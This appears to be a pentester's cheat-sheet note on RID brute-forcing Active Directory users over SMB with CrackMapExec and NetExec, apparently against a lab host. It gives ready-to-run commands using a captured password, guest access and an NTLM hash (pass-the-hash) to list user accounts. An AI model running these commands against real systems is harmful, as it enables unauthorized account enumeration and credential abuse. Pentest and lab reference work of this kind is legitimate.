CrackMapExec / NetExec - RID Brute
Authenticated RID brute
crackmapexec smb 10.10.253.194 -u 'twilliams' -p 'roastpotatoes' --rid-brute | tee crackmapexec-rid-brute
netexec smb 10.10.253.194 -u 'twilliams' -p 'roastpotatoes' --rid-brute | tee crackmapexec-rid-brute
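Sometimes works as guest (empty password); the second command keeps only the SidTypeUser entries and writes the account names to userlist2.txt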
crackmapexec smb 10.10.253.194 -u 'guest' -p '' --rid-brute | tee crackmapexec-rid-brute
netexec smb "$target" -u 'guest' -p '' --rid-brute | grep -i 'sidtypeuser' | awk '{print $6}' | cut -d '\' -f2 | tee userlist2.txt
Pull users with an NTLM hash instead of a password (-H)
netexec smb "$target" -u leicester.lawton -H 25cac0569934a5f6e01e9e440e0dce5b --users | awk '{print $5}' | grep -Fv '[*]' | tee users2